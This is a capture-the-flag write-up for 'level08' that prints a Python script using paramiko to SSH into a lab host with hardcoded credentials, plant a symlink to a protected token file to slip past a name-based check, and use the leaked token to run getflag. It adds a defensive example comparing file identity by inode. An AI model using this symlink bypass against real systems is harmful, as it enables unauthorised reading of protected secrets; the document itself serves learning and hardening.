Introduction
In level 08, we exploit a vulnerable program, `level08`, to obtain the flag by leveraging a Python script that utilizes SSH to execute commands.
Steps:
- Understanding the Exploit Python Script:
We examine the provided Python script:

```python
#!/usr/bin/python3
try:
    from paramiko import SSHClient, AutoAddPolicy
    from time import sleep
except ImportError as err:
    # Without paramiko nothing below can run, so stop here.
    raise SystemExit(err)


def get_token():
    """Log in as level08 and read the token through a symlink."""
    client = SSHClient()
    # AutoAddPolicy accepts any unknown host key; tolerable only for a lab VM.
    client.set_missing_host_key_policy(AutoAddPolicy())
    client.connect('10.13.249.103', username='level08', password='fiumuikeil55xe9cu4dood66h', port=4242)
    sleep(1)
    # Point /tmp/exploit at the token file, then pass the link to level08.
    stdin, stdout, stderr = client.exec_command('rm -rf /tmp/exploit && ln -s $(pwd)/token /tmp/exploit && ./level08 /tmp/exploit')
    output = stdout.read()
    client.close()
    # The first line of output is the token.
    return output.decode('utf-8').split('\n')[0]


def get_flag(token):
    """Log in as flag08 with the token as password and run getflag."""
    client = SSHClient()
    client.set_missing_host_key_policy(AutoAddPolicy())
    client.connect('10.13.249.103', username='flag08', password=token, port=4242)
    sleep(1)
    stdin, stdout, stderr = client.exec_command('getflag')
    output = stdout.read()
    client.close()
    return output.decode('utf-8').split('\n')[0]


if __name__ == "__main__":
    token = get_token()
    print("[+] Humm the nunuts token... %s" % (token))
    print("[+] Flag08 : %s" % (get_flag(token)))
```
The script uses the paramiko library to establish SSH connections. The `get_token()` function connects as the `level08` user, creates a symbolic link `/tmp/exploit` pointing to the file named `token`, and then executes `./level08 /tmp/exploit` to obtain the token. The `get_flag()` function connects as the `flag08` user, using the obtained token as the password, and retrieves the flag.
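The write-up does not show the check inside `level08`. Assuming it refuses any path whose text contains `token`, which is why the link name `/tmp/exploit` gets through, the following added example (not from the original write-up or the level's binary) contrasts that name-based check with one that compares the identity of the file actually opened. The sandbox files, `notes.txt` and both function names are constructed for illustration.

```python
import os
import tempfile

PROTECTED = "token"  # file the checker must not disclose (name taken from the write-up)

def name_check_allows(path):
    # Assumed level08-style check: refuse only when the path text contains "token".
    return PROTECTED not in path

def identity_check_allows(path, protected=PROTECTED):
    # Hardened check: open first, then compare (device, inode) of the opened
    # descriptor with the protected file, so the decision is about the object
    # that will be read, not about the name used to reach it.
    fd = os.open(path, os.O_RDONLY)
    try:
        return not os.path.samestat(os.fstat(fd), os.stat(protected))
    finally:
        os.close(fd)

def demo():
    # Constructed sandbox: a protected file, an unrelated file, and a symlink
    # to the protected file under a name that avoids the deny-listed word.
    old_cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as sandbox:
        os.chdir(sandbox)
        try:
            with open(PROTECTED, "w") as f:
                f.write("constructed-secret\n")
            with open("notes.txt", "w") as f:
                f.write("unrelated\n")
            os.symlink(os.path.abspath(PROTECTED), "exploit")
            return {p: (name_check_allows(p), identity_check_allows(p))
                    for p in (PROTECTED, "exploit", "notes.txt")}
        finally:
            os.chdir(old_cwd)

if __name__ == "__main__":
    for path, (by_name, by_identity) in demo().items():
        print(f"{path:10} name-check allows={by_name!s:5} identity-check allows={by_identity}")
```

Because the identity check runs `fstat` on the descriptor it has already opened, the file it inspects is the same one it would go on to read, leaving no gap between check and use.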
- Executing the Python Script:
We execute the Python script to retrieve the token and the flag:

```
$ python3 exploit.py
```

The script connects to the server, retrieves the token, and then uses it to connect as `flag08` and obtain the flag.
Conclusion
By exploiting the vulnerability in the level08 program using the provided Python script, we successfully retrieved the flag for level 08.